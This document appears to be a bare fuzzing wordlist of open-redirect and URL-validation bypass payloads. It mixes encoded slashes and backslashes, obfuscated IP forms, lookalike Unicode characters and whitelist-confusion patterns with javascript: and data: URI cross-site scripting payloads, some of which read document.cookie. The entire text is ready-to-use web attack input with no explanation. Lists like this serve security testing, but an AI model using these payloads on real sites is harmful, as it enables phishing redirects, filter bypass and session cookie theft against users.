
/〱example.com
〱example.com
/〱google.com
〱google.com
/〱localdomain.pw
〱localdomain.pw
/〵example.com
〵example.com
/〵google.com
〵google.com
/〵localdomain.pw
〵localdomain.pw
/ゝexample.com
ゝexample.com
/ゝgoogle.com
ゝgoogle.com
/ゝlocaldomain.pw
ゝlocaldomain.pw
/ーexample.com
ーexample.com
/ｰexample.com
ｰexample.com
/ーgoogle.com
ーgoogle.com
/ｰgoogle.com
ｰgoogle.com
/ーlocaldomain.pw
ーlocaldomain.pw
/ｰlocaldomain.pw
ｰlocaldomain.pw
/%09/example.com
//%09/example.com
///%09/example.com
////%09/example.com
/%09/example.com@example.com
//%09/example.com@example.com
///%09/example.com@example.com
////%09/example.com@example.com
/%09/example.com@google.com
//%09/example.com@google.com
///%09/example.com@google.com
////%09/example.com@google.com
/%09/google.com
//%09/google.com
///%09/google.com
////%09/google.com
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/localdomain.pw
//%09/localdomain.pw
///%09/localdomain.pw
////%09/localdomain.pw
/%09/%whitelist%@example.com
//%09/%whitelist%@example.com
///%09/%whitelist%@example.com
////%09/%whitelist%@example.com
/%09/%whitelist%@localdomain.pw
//%09/%whitelist%@localdomain.pw
///%09/%whitelist%@localdomain.pw
////%09/%whitelist%@localdomain.pw
/%09/www.whitelisteddomain.tld@google.com
//%09/www.whitelisteddomain.tld@google.com
///%09/www.whitelisteddomain.tld@google.com
////%09/www.whitelisteddomain.tld@google.com
/%09/www.whitelisteddomain.tld@localdomain.pw
//%09/www.whitelisteddomain.tld@localdomain.pw
///%09/www.whitelisteddomain.tld@localdomain.pw
////%09/www.whitelisteddomain.tld@localdomain.pw
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://%whitelist%/%250Aconfirm%25281%2529
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%2fexample.com
/%2f%2fgoogle.com
/%2f%2flocaldomain.pw
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
//%2fxexample.com
//%2fxgoogle.com
//3H6k7lIAiqjfNeN@example.com+@example.com/
//3H6k7lIAiqjfNeN@example.com@example.com/
//3H6k7lIAiqjfNeN@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//3H6k7lIAiqjfNeN@%whitelist%+@localdomain.pw/
//3H6k7lIAiqjfNeN@%whitelist%@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
/%5cexample.com
//%5cexample.com
///%5cexample.com
////%5cexample.com
/%5cexample.com@example.com
//%5cexample.com@example.com
///%5cexample.com@example.com
////%5cexample.com@example.com
/%5cexample.com@google.com
//%5cexample.com@google.com
///%5cexample.com@google.com
////%5cexample.com@google.com
/%5cgoogle.com
//%5cgoogle.com
///%5cgoogle.com
////%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
/%5clocaldomain.pw
//%5clocaldomain.pw
///%5clocaldomain.pw
////%5clocaldomain.pw
/%5c%whitelist%@example.com
//%5c%whitelist%@example.com
///%5c%whitelist%@example.com
////%5c%whitelist%@example.com
/%5c%whitelist%@localdomain.pw
//%5c%whitelist%@localdomain.pw
///%5c%whitelist%@localdomain.pw
////%5c%whitelist%@localdomain.pw
/%5cwww.whitelisteddomain.tld@google.com
//%5cwww.whitelisteddomain.tld@google.com
///%5cwww.whitelisteddomain.tld@google.com
////%5cwww.whitelisteddomain.tld@google.com
/%5cwww.whitelisteddomain.tld@localdomain.pw
//%5cwww.whitelisteddomain.tld@localdomain.pw
///%5cwww.whitelisteddomain.tld@localdomain.pw
////%5cwww.whitelisteddomain.tld@localdomain.pw
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
";alert(0);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:%whitelist%;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
//%EF%B9%B0/https://google.com
/.example.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
////example.com//
///\;@example.com
///example.com
///example.com/
///example.com//
//;@example.com
//example.com
//example.com/
//example.com//
/<>//example.com
/\/\/example.com/
/\/example.com/
<>//example.com
@example.com
\/\/example.com/
////example.com/%2e%2e
///example.com/%2e%2e
//example.com/%2e%2e
////example.com/%2e%2e%2f
///example.com/%2e%2e%2f
//example.com/%2e%2e%2f
////example.com/%2f..
///example.com/%2f..
//example.com/%2f..
////example.com/%2f%2e%2e
///example.com/%2f%2e%2e
//example.com/%2f%2e%2e
/example.com/%2f%2e%2e
//example.com:80#@example.com/
//example.com:80?@example.com/
////example.com@example.com/
////example.com@example.com//
///example.com@example.com/
///example.com@example.com//
//example.com@example.com/
//example.com@example.com//
//example.com\@example.com
////example.com@example.com/%2e%2e
///example.com@example.com/%2e%2e
////example.com@example.com/%2e%2e%2f
///example.com@example.com/%2e%2e%2f
//example.com@example.com/%2e%2e%2f
////example.com@example.com/%2f..
///example.com@example.com/%2f..
//example.com@example.com/%2f..
////example.com@example.com/%2f%2e%2e
///example.com@example.com/%2f%2e%2e
//example.com@example.com/%2f%2e%2e
//example.com+&@example.com#+@example.com/
////example.com@google.com/
////example.com@google.com//
///example.com@google.com/
///example.com@google.com//
//example.com@google.com/
//example.com@google.com//
////example.com@google.com/%2e%2e
///example.com@google.com/%2e%2e
////example.com@google.com/%2e%2e%2f
///example.com@google.com/%2e%2e%2f
//example.com@google.com/%2e%2e%2f
////example.com@google.com/%2f..
///example.com@google.com/%2f..
//example.com@google.com/%2f..
////example.com@google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
//example.com@google.com/%2f%2e%2e
//example.com+&@google.com#+@example.com/
//example.com@https:///example.com/%2e%2e
//example.com@https:///google.com/%2e%2e
//example.com\texample.com/
//example.com\@%whitelist%
//google%00.com
/.google.com
//#//google.com/
/////google.com/
////google.com/
////google.com//
///\;@google.com
///google.com
///google.com/
///google.com//
//;@google.com
//google.com
//google.com/
//google.com//
/\/google.com/
<>//google.com
@google.com
\/\/google.com/
\\google.com
////google.com/%2e%2e
///google.com/%2e%2e
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com:80#@example.com/
//google.com:80?@example.com/
//google.com/..;/css
//google.com\@example.com
//google.com\texample.com/
//google.com\@www.whitelisteddomain.tld
//google%E3%80%82com
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::216.58.214.206]
http:[::216.58.214.206]
http://3627734734
http:3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@example.com+@example.com/
http://3H6k7lIAiqjfNeN@example.com@example.com/
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@%whitelist%+@localdomain.pw/
http://3H6k7lIAiqjfNeN@%whitelist%@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
http://472.314.470.462
http:472.314.470.462
//%http://5cgoogle.com
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
http://;@example.com
http://example.com@00330.00072.0000326.00000316
http:example.com@00330.00072.0000326.00000316
http://example.com@00330.0x3a.54990
http:example.com@00330.0x3a.54990
http://example.com@00330.3856078
http:example.com@00330.3856078
http://example.com@0330.072.0326.0316
http:example.com@0330.072.0326.0316
http://example.com@0xd8.072.54990
http:example.com@0xd8.072.54990
http://example.com@0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.3856078
http:example.com@0xd8.3856078
http://example.com@0xd83ad6ce
http:example.com@0xd83ad6ce
http://example.com@[::216.58.214.206]
http:example.com@[::216.58.214.206]
http://example.com%23.example.com/
http://example.com%2eexample.com/
http://example.com%2egoogle.com/
http://example.com%2f%2f.example.com/
http://example.com@3627734734
http:example.com@3627734734
http://example.com%3F.example.com/
http://example.com@472.314.470.462
http:example.com@472.314.470.462
http://example.com%5c%5c.example.com/
http://example.com:80%40example.com/
http://example.com:80%40google.com/
http://example.com:80#@example.com/
http://example.com:80?@example.com/
http://example.com:80#@%whitelist%/
http://example.com:80?@%whitelist%/
http://example.com+&@example.com#+@example.com/
http://example.com@[::ffff:216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http://example.com+&@google.com#+@example.com/
http://example.com\texample.com/
http://[::ffff:216.58.214.206]
http:[::ffff:216.58.214.206]
//\http://google.com
/http://google.com
/http:/google.com
http:///////////google.com
http://;@google.com
http://google.com%23.example.com/
http://google.com%2f%2f.example.com/
http://google.com%3F.example.com/
http://google.com%5c%5c.example.com/
http://google.com:80#@example.com/
http://google.com:80?@example.com/
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:80?@www.whitelisteddomain.tld/
http://google.com\texample.com/
http://google.com&www.whitelisteddomain.tld
http://google.com\www.whitelisteddomain.tld
/http://localdomain.pw
/http:/localdomain.pw
http://.localdomain.pw
http://;@localdomain.pw
http://localdomain.pw%23.%whitelist%/
http://localdomain.pw%23.www.whitelisteddomain.tld/
http://localdomain.pw%2f%2f.%whitelist%/
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
http://localdomain.pw%3F.%whitelist%/
http://localdomain.pw%3F.www.whitelisteddomain.tld/
http://localdomain.pw%5c%5c.%whitelist%/
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
http://localdomain.pw:80#@%whitelist%/
http://localdomain.pw:80?@%whitelist%/
http://localdomain.pw:80#@www.whitelisteddomain.tld/
http://localdomain.pw:80?@www.whitelisteddomain.tld/
http://localdomain.pw\t%whitelist%/
http://localdomain.pw\twww.whitelisteddomain.tld/
/https://%09/example.com
https://%09/example.com
https://%09/example.com@example.com
https://%09/example.com@google.com
https://%09/google.com
https://%09/localdomain.pw
https://%09/%whitelist%@example.com
https://%09/%whitelist%@localdomain.pw
https://%09/www.whitelisteddomain.tld@google.com
https://%09/www.whitelisteddomain.tld@localdomain.pw
/https:/%5cexample.com/
/https://%5cexample.com
https://%5cexample.com
/https://%5cexample.com@example.com
https://%5cexample.com@example.com
/https://%5cexample.com@google.com
https://%5cexample.com@google.com
/https:/%5cgoogle.com/
/https://%5cgoogle.com
https://%5cgoogle.com
/https:/%5clocaldomain.pw/
/https://%5clocaldomain.pw
https://%5clocaldomain.pw
/https://%5c%whitelist%@example.com
https://%5c%whitelist%@example.com
/https://%5c%whitelist%@localdomain.pw
https://%5c%whitelist%@localdomain.pw
/https://%5cwww.whitelisteddomain.tld@google.com
https://%5cwww.whitelisteddomain.tld@google.com
/https://%5cwww.whitelisteddomain.tld@localdomain.pw
https://%5cwww.whitelisteddomain.tld@localdomain.pw
//https://example.com//
/https://example.com
/https://example.com/
/https://example.com//
/https:example.com
https://example.com
https://example.com/
https://example.com//
https:example.com
//https:///example.com/%2e%2e
/https:///example.com/%2e%2e
/https://example.com/%2e%2e
https:///example.com/%2e%2e
//https://example.com/%2e%2e%2f
/https://example.com/%2e%2e%2f
https://example.com/%2e%2e%2f
/https://example.com/%2f..
https://example.com/%2f..
/https:///example.com/%2f%2e%2e
/https://example.com/%2f%2e%2e
https:///example.com/%2f%2e%2e
https://example.com/%2f%2e%2e
//https://example.com@example.com//
/https://example.com@example.com/
https://:@example.com\@example.com
https://example.com@example.com
https://example.com@example.com/
https://example.com@example.com//
/https://example.com@example.com/%2e%2e
https:///example.com@example.com/%2e%2e
//https://example.com@example.com/%2e%2e%2f
https://example.com@example.com/%2e%2e%2f
/https://example.com@example.com/%2f..
https://example.com@example.com/%2f..
/https:///example.com@example.com/%2f%2e%2e
/https://example.com@example.com/%2f%2e%2e
https:///example.com@example.com/%2f%2e%2e
https://example.com@example.com/%2f%2e%2e
//https://example.com@google.com//
/https://example.com@google.com/
https://example.com@google.com
https://example.com@google.com/
https://example.com@google.com//
/https://example.com@google.com/%2e%2e
https:///example.com@google.com/%2e%2e
//https://example.com@google.com/%2e%2e%2f
https://example.com@google.com/%2e%2e%2f
/https://example.com@google.com/%2f..
https://example.com@google.com/%2f..
/https:///example.com@google.com/%2f%2e%2e
/https://example.com@google.com/%2f%2e%2e
https:///example.com@google.com/%2f%2e%2e
https://example.com@google.com/%2f%2e%2e
https://example.com/https://example.com/
https://example.com/https://google.com/
https://:@example.com\@%whitelist%
//https://google.com//
/https://google.com/
https://google.com
https://google.com/
https://google.com//
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@example.com
https://:@google.com\@www.whitelisteddomain.tld
//https://localdomain.pw//
/https://localdomain.pw/
https://localdomain.pw
https://localdomain.pw/
https://localdomain.pw//
https:localdomain.pw
//https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
//https://localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
/https://localdomain.pw/%2f..
https://localdomain.pw/%2f..
/https:///localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
https://:@localdomain.pw\@%whitelist%
https://:@localdomain.pw\@www.whitelisteddomain.tld
//https://%whitelist%@example.com//
/https://%whitelist%@example.com/
https://%whitelist%@example.com
https://%whitelist%@example.com/
https://%whitelist%@example.com//
/https://%whitelist%@example.com/%2f..
https://%whitelist%@example.com/%2f..
https://%whitelist%/https://localdomain.pw/
https://%whitelist%/https://www.example.com/
//https://%whitelist%@localdomain.pw//
/https://%whitelist%@localdomain.pw/
https://%whitelist%@localdomain.pw
https://%whitelist%@localdomain.pw/
https://%whitelist%@localdomain.pw//
/https://%whitelist%@localdomain.pw/%2e%2e
https:///%whitelist%@localdomain.pw/%2e%2e
//https://%whitelist%@localdomain.pw/%2e%2e%2f
https://%whitelist%@localdomain.pw/%2e%2e%2f
/https://%whitelist%@localdomain.pw/%2f..
https://%whitelist%@localdomain.pw/%2f..
/https://%whitelist%@localdomain.pw/%2f%2e%2e
/https:///%whitelist%@localdomain.pw/%2f%2e%2e
https://%whitelist%@localdomain.pw/%2f%2e%2e
https:///%whitelist%@localdomain.pw/%2f%2e%2e
/https://%whitelist%@www.example.com/%2e%2e
https:///%whitelist%@www.example.com/%2e%2e
//https://%whitelist%@www.example.com/%2e%2e%2f
https://%whitelist%@www.example.com/%2e%2e%2f
/https://%whitelist%@www.example.com/%2f%2e%2e
/https:///%whitelist%@www.example.com/%2f%2e%2e
https://%whitelist%@www.example.com/%2f%2e%2e
https:///%whitelist%@www.example.com/%2f%2e%2e
//https:///www.example.com/%2e%2e
/https://www.example.com/%2e%2e
https:///www.example.com/%2e%2e
//https://www.example.com/%2e%2e%2f
https://www.example.com/%2e%2e%2f
/https:///www.example.com/%2f%2e%2e
/https://www.example.com/%2f%2e%2e
https:///www.example.com/%2f%2e%2e
https://www.example.com/%2f%2e%2e
//https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
https:///www.google.com/%2e%2e
//https://www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
/https:///www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
//https://www.whitelisteddomain.tld@google.com//
/https://www.whitelisteddomain.tld@google.com/
https://www.whitelisteddomain.tld@google.com
https://www.whitelisteddomain.tld@google.com/
https://www.whitelisteddomain.tld@google.com//
/https://www.whitelisteddomain.tld@google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
https://www.whitelisteddomain.tld/https://localdomain.pw/
https://www.whitelisteddomain.tld/https://www.google.com/
//https://www.whitelisteddomain.tld@localdomain.pw//
/https://www.whitelisteddomain.tld@localdomain.pw/
https://www.whitelisteddomain.tld@localdomain.pw
https://www.whitelisteddomain.tld@localdomain.pw/
https://www.whitelisteddomain.tld@localdomain.pw//
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
/https://www.whitelisteddomain.tld@localdomain.pw/%2f..
https://www.whitelisteddomain.tld@localdomain.pw/%2f..
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
http:%whitelist%@00330.00072.0000326.00000316
http://%whitelist%@00330.00072.0000326.00000316
http:%whitelist%@00330.0x3a.54990
http://%whitelist%@00330.0x3a.54990
http:%whitelist%@00330.3856078
http://%whitelist%@00330.3856078
http:%whitelist%@0330.072.0326.0316
http://%whitelist%@0330.072.0326.0316
http:%whitelist%@0xd8.072.54990
http://%whitelist%@0xd8.072.54990
http:%whitelist%@0xd8.0x3a.0xd6.0xce
http://%whitelist%@0xd8.0x3a.0xd6.0xce
http:%whitelist%@0xd8.3856078
http://%whitelist%@0xd8.3856078
http:%whitelist%@0xd83ad6ce
http://%whitelist%@0xd83ad6ce
http:%whitelist%@[::216.58.214.206]
http://%whitelist%@[::216.58.214.206]
http://%whitelist%%2elocaldomain.pw/
http:%whitelist%@3627734734
http://%whitelist%@3627734734
http:%whitelist%@472.314.470.462
http://%whitelist%@472.314.470.462
http://%whitelist%:80%40localdomain.pw/
http:%whitelist%@[::ffff:216.58.214.206]
http://%whitelist%@[::ffff:216.58.214.206]
http://%whitelist%+&@localdomain.pw#+@%whitelist%/
http://www.localdomain.pw\.%whitelist%
http://www.localdomain.pw\.www.whitelisteddomain.tld
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http://www.whitelisteddomain.tld@0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http://www.whitelisteddomain.tld@0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http://www.whitelisteddomain.tld@0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http://www.whitelisteddomain.tld@[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http://www.whitelisteddomain.tld%2elocaldomain.pw/
http://www.whitelisteddomain.tld@3627734734
http:www.whitelisteddomain.tld@3627734734
http://www.whitelisteddomain.tld@472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http://www.whitelisteddomain.tld:80%40localdomain.pw/
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld.google.com
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@example.com+@example.com/
http://XY>.7d8T\205pZM@example.com@example.com/
http://XY>.7d8T\205pZM@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@%whitelist%+@localdomain.pw/
http://XY>.7d8T\205pZM@%whitelist%@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
javascript: //% 250Alert (document.location = document.cookie)
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript://example.com?%a0alert%281%29
javascript://https://example.com/?z=%0Aalert(1)
javascript://https://%whitelist%/?z=%0Aalert(1)
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
jaVAscript://%whitelist%//%0d%0aalert(1);//
javascript://%whitelist%?%a0alert%281%29
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
//localdomain%00.pw
//localdomain%E3%80%82pw
.localdomain.pw
/.localdomain.pw
/////localdomain.pw
/////localdomain.pw/
////localdomain.pw/
////localdomain.pw//
///\;@localdomain.pw
///localdomain.pw
///localdomain.pw/
///localdomain.pw//
//;@localdomain.pw
//localdomain.pw
//localdomain.pw/
//localdomain.pw//
/\/localdomain.pw/
<>//localdomain.pw
@localdomain.pw
\/\/localdomain.pw/
////localdomain.pw/%2e%2e
///localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
//localdomain.pw/%2e%2e%2f
////localdomain.pw/%2f..
///localdomain.pw/%2f..
//localdomain.pw/%2f..
////localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
//localdomain.pw/%2f%2e%2e
/localdomain.pw/%2f%2e%2e
//localdomain.pw:80#@%whitelist%/
//localdomain.pw:80?@%whitelist%/
//localdomain.pw:80#@www.whitelisteddomain.tld/
//localdomain.pw:80?@www.whitelisteddomain.tld/
//localdomain.pw\t%whitelist%/
//localdomain.pw\twww.whitelisteddomain.tld/
//localdomain.pw\@%whitelist%
//localdomain.pw\@www.whitelisteddomain.tld
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
//%whitelist%@example.com/
//%whitelist%@example.com//
///%whitelist%@example.com/
///%whitelist%@example.com//
////%whitelist%@example.com/
////%whitelist%@example.com//
//%whitelist%@example.com/%2f..
///%whitelist%@example.com/%2f..
////%whitelist%@example.com/%2f..
//%whitelist%@https:///localdomain.pw/%2e%2e
//%whitelist%@https:///www.example.com/%2e%2e
//%whitelist%@localdomain.pw/
//%whitelist%@localdomain.pw//
///%whitelist%@localdomain.pw/
///%whitelist%@localdomain.pw//
////%whitelist%@localdomain.pw/
////%whitelist%@localdomain.pw//
///%whitelist%@localdomain.pw/%2e%2e
////%whitelist%@localdomain.pw/%2e%2e
//%whitelist%@localdomain.pw/%2e%2e%2f
///%whitelist%@localdomain.pw/%2e%2e%2f
////%whitelist%@localdomain.pw/%2e%2e%2f
//%whitelist%@localdomain.pw/%2f..
///%whitelist%@localdomain.pw/%2f..
////%whitelist%@localdomain.pw/%2f..
//%whitelist%@localdomain.pw/%2f%2e%2e
///%whitelist%@localdomain.pw/%2f%2e%2e
////%whitelist%@localdomain.pw/%2f%2e%2e
//%whitelist%+&@localdomain.pw#+@%whitelist%/
///%whitelist%@www.example.com/%2e%2e
////%whitelist%@www.example.com/%2e%2e
//%whitelist%@www.example.com/%2e%2e%2f
///%whitelist%@www.example.com/%2e%2e%2f
////%whitelist%@www.example.com/%2e%2e%2f
//%whitelist%@www.example.com/%2f%2e%2e
///%whitelist%@www.example.com/%2f%2e%2e
////%whitelist%@www.example.com/%2f%2e%2e
////www.example.com/%2e%2e
///www.example.com/%2e%2e
////www.example.com/%2e%2e%2f
///www.example.com/%2e%2e%2f
//www.example.com/%2e%2e%2f
////www.example.com/%2f%2e%2e
///www.example.com/%2f%2e%2e
//www.example.com/%2f%2e%2e
////www.google.com/%2e%2e
///www.google.com/%2e%2e
//www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
//www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
//www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@google.com/
////www.whitelisteddomain.tld@google.com//
///www.whitelisteddomain.tld@google.com/
///www.whitelisteddomain.tld@google.com//
//www.whitelisteddomain.tld@google.com/
//www.whitelisteddomain.tld@google.com//
////www.whitelisteddomain.tld@google.com/%2f..
